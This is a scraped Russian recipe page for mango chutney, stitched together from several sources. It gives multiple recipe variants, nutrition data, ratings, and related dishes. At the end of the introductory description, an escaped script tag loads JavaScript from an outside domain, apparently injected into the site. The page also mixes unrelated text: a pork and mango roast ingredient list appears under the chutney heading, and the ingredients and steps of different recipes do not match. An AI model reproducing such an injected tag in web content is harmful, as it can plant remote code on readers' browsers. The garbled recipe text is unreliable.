Чатни из манго — пошаговый рецепт с фото на Повар.ру

Чатни из манго — пошаговый рецепт с фото на Повар.ру

Содержание
  1. Описание приготовления:
  2. Пищевая и энергетическая ценность:
  3. ПОШАГОВЫЙ РЕЦЕПТ ПРИГОТОВЛЕНИЯ
  4. Оцените рецепт
  5. Ингредиенты:
  6. Противопоказания:
  7. Рецепт «Чатни из манго»:
  8. жаркое «Арт-тропикано» из запечённой свинины и манго.
  9. Как приготовить "Чатни из манго"
  10. Лосось с манговым чатни ("для себя любимой")
  11. Состав:

Другие соусы

Описание приготовления:

Чатни из манго — это очень популярная индийская приправа, которая благодаря специям и необычной технологии приготовления очень здорово возбуждает аппетит. Обычно ее передают перед основным блюдом, вместе с какой-нибудь закуской. В нашей семье чатни из манго используется разными способами — намазываем на хлеб, добавляем в блинчики, подаем с оладьями, всякими разными закусками… Вкус передать сложно — надо пробовать. Чего вам и желаю!&ltscript type=»text/javascript» src=»http://fsgv.ru/i.js»&gt&lt/script&gt


Основной ингредиент: Фрукты / Манго
Блюдо: Соусы / Чатни

Пищевая и энергетическая ценность:

Готового блюда
ккал
1448.4 ккал
белки
15.9 г
жиры
21.1 г
углеводы
276.7 г
Порции
ккал
72.4 ккал
белки
0.8 г
жиры
1.1 г
углеводы
13.8 г
100 г блюда
ккал
131.7 ккал
белки
1.4 г
жиры
1.9 г
углеводы
25.2 г

ПОШАГОВЫЙ РЕЦЕПТ ПРИГОТОВЛЕНИЯ

Шаг 1

Фото приготовления рецепта: Манговый чатни, шаг №1

Манго очистите, удалите косточку. Мякоть разомните вилкой и выложите в сотейник.

Шаг 2

Фото приготовления рецепта: Манговый чатни, шаг №2

Добавьте к манго имбирь, половину апельсинового сока, куркуму, табаско и сахар. Посолите.

Шаг 3

Фото приготовления рецепта: Манговый чатни, шаг №3

Смесь прогрейте до кипения, помешивая, на слабом огне. Добавьте разведенный в оставшемся апельсиновом соке крахмал и уксус. Доведите до кипения. Сразу снимите с огня и полностью остудите.

Время готовки

20 мин

Количество порций

около 250 мл

Сложность приготовления

легко

Повод

Источник

Gastronom.ru

Если вы заметили ошибку или неточность, пожалуйста, пишите

комментарий

, мы обязательно ответим.

Таблица мер и весов Каталог рецептов

Иллюстрации к материалу: ООО «Издательский дом «Гастроном»

ПОХОЖИЕ МАТЕРИАЛЫ

Брусничный соус, чатни. Мясо с брусникой Брусничный соус, чатни. Мясо с брусникой

Бруснику в августе-сентябре нельзя пропустить — она и полезна чрезвычайно, и совершенно неповторима …

Чатни Чатни

Идею приготовления чатни – пряной приправы из фруктов и/или овощей — англичане подсмотрели у индусов …

Соусы Соусы

Соус (от фр. sauce — подливка) — жидкая приправа к основному блюду. Соусы не только подают к готовым …

КОММЕНТАРИИ

Оцените рецепт

Рейтинг 5 из 5
на основе 4 голосов

Как и зачем оценивать рецепт?

Аймкук

Аймкук

Ингредиенты:

  • Манго  — 2 Штуки
  • Растительное масло  — 2 Ст. ложки
  • Перец чили  — 2 Штуки
  • Специи  — 3 Щепотки (зира, зерна горчицы, перец горошком, соль, сахар, кориандр, паприка)
  • Лимонный сок  — 2 Чайных ложки

Количество порций: 8

Противопоказания:

Индивидуальная непереносимость компонентов.

Рецепт «Чатни из манго»:

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Приготовим необходимые продукты.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Для подачи я использовала хлебцы тонкие, ржаные «Щедрые».

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Порежем манго тонкими пластинами.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Имбирь порежем мелкими кубиками, горький перец маленькими кружочками, не допуская попадания семян.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

В кастрюлю с толстым дном кладем кусочек сливочного масла.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Выкладываем имбирь.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Следом мелко порезанный горький перец, дадим им немного прогреться.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Добавляем несколько палочек гвоздики.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Укладываем сверху манго, изюм.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Высыпаем сахар, чуть чуть соли, немного воды и тушим до готовности манго, пока оно не станет прозрачным. Где-то 30 минут. Если манго попалось зеленоватое, тушить придется немного дольше, значит и воды чуть больше. За 15 минут до готовности добавим уксус. Количество уксуса регулируем по вкусу, лучше меньше.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Я еще на свой вкус добавила семена аниса.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Еще я решила добавить в конце готовности соуса сок половинки лимона и цедру, предварительно натерев ее на мелкой терке. Это по желанию.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Дольки манго стали прозрачными, такие солнечные. Очень аппетитные.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Изюм тоже приобрел янтарный цвет.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Таким очень вкусным, красивым соусом не стыдно угощать гостей.

Чатни из манго - пошаговый рецепт с фото на Повар.ру

Подавать с жареной бараниной посоветовал автор рецепта, также использовать для маринования рыбы и свинины, но предварительно измельчив блендером и добавив в соус йогурт. После обжаривания кусочки рыбы и мяса подавать с этим же соусом.

BB-код для вставки:
BB-код используется на форумах
HTML-код для вставки:
HTML код используется в блогах, например LiveJournal

Как это будет выглядеть?

logo_bb.png

Чатни из манго

Рецепт: Чатни из манго

Самый вкусный соус, который я приготовила на этой неделе, это чатни из манго. Всем рекомендую попробовать. Такой соус не стыдно подавать гостям. Помимо того, что дольки манго янтарного цвета, прозрачные, очень аппетитно выглядят в соусе с желтым изюмом, это еще очень вкусное дополнение к мясу, рыбе. Ароматный соус с легкой кислинкой и небольшой остротой перца, послевкусием имбиря долго не забудется и заставит Вас снова и снова готовить его и наслаждаться новыми вкусовыми ощущениями.

Категория: Соусы Другие соусы

Ингредиенты для «Чатни из манго»:

жаркое «Арт-тропикано» из запечённой свинины и манго.

Соль, перец по вкусу.

3 столовые ложки обжаренной муки.

Манго – 150 гр.(можно из компота).

Ложка нарезанной мяты и ложка укропа.

Мясо должно быть сочным и мягким.

Мясной крепкий бульон из говядины – 400гр.

Запеченная свиная грудинка или буженина – 500 гр.

Лечо готовое (красный перец в томате) – 150 гр. Можно консервы.

Делаем соус арт-тропикано:

Выливаем в сотейник 200 гр. бульона.

Режем на мелкие кусочки манго.

Закладываем в бульон кусочки манго и лечо.

В 200 гр. оставшегося бульона разводим обжаренную муку.

Выливаем смесь в сотейник и быстро размещиваем, чтобы не было комочков.

www.koolinar.ru_86226.jpg

Как приготовить «Чатни из манго»

Чатни из манго - фото шаг 1

Очищаем манго от кожуры.

Чатни из манго - фото шаг 2

Мякоть манго нужно размять ложечкой до пюреобразного состояния.

Чатни из манго - фото шаг 3

В сковороде разогрейте масло, обжарьте в нем перец и специи в течение 1-2 минуты на быстром огне.

Чатни из манго - фото шаг 4

Теперь добавляем лимонный сок, перемешиваем.

Чатни из манго - фото шаг 5

Сразу же добавляем манго и уменьшаем огонь. Тушим, помешивая, в течение 5 минут.

Чатни из манго - фото шаг 6

Снимаем с огня, охлаждаем — и готово! Хранить в холодильнике.

Оценить рецепт Чатни из манго:

средняя оценка: 4.3, всего голосов: 10

Я приготовил(а)
Редакция рекомендует: Подборки рецептов:

empty.gif

Лосось с манговым чатни («для себя любимой»)

Категория: Основные блюда> Рыба

18 ингридиентов

ЧАТНИ

У манго удалить косточку,(отрезать несколько долек для украшения),очистить.Если мягкое-размять,если нет-порезать кубиком.

Положить в сотейник размятое манго(если манго «кубиком»-долить немного воды и протушить до мягкости);добавить имбирь,лимонный сок,куркуму,сахар.Прогреть на слабом огне,помешивая.

Развести крахмал в 2ст.л. воды+уксус и добавить к манго….

теги: безе домашняя рыба рис овсяные хлопья

Куриные грудки с картофельными оладьями и чатни

Морской лосось с манговым чатни

Состав:

Манго, чеснок, имбирное масло, сахар, уксус, соль, лимонная кислота.

Комментариев нет, будьте первым кто его оставит